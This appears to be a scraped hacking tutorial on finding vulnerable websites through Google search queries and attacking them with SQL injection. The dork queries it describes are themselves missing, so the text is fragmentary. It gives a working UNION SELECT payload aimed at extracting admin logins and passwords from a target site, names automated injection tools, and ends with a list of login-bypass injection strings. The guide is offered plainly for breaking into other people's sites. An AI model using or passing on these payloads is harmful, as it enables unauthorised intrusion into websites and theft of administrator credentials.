Beruflich Dokumente
Kultur Dokumente
Drawback :- This google query is nice but will work for only that sites
which's security is very very low.
Information Of Query :-This query will show you all the results of
the infected url/script,at
there we can make and SQL injection attack weather it is in the POST form or
the GET form.I tried here to give you guys a small code of manual
SQL injection for only this particular script.For me,it worked many times.Let's
hope it will also work for you guys.enjoy.
Code:
/texts?newsid=-1+union+select+1,2,concat_ws(0x3a,login,password),
4,5,6,7+from+b_admin—
Target Example :-
Code:
http://www.TargetWebsite.domain/news/texts?newsid=-
1+union+select+1,2,concat_ws%280x3a,login,password
%29,%204,5,6,7+from+b_admin--
Information Of Query :- This query will show you all the results on
the google page which starts from the index.php?id= or index.asp?id=.But the
basic benifit is that this query will directly redirect you on the page which will
have the MYSQL database or stack overflow error.So this is a nice query to
find another SQL vulnerable site,because it gives the direct link of that.In
exploit scanner and another software you will find only some links.As you guys
know google updates every minutes because every new website's information
they have to update in their database.so enjot this query.
Attack Details :- SQL injection :- Tools :- havij 1.7,SQLi Helper 2.7 ,Web
crusier,Acunetix Web Vulnerability Scanner 6 Or mannual SQL injection
method.
Information Of Query :-
-->I think no need for the descpriction.Each query has its own quality.Each
query You will give to google it will redirect you the thousands of the
pages.and then you have to find the vulnerable url and you can made an attack.
-->You can also use this dorks in the exploit scanner which will directly do a
process and give you the vulnerable sites.
' or '1'='1
'or 'x'='x
'or 0=0--
or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'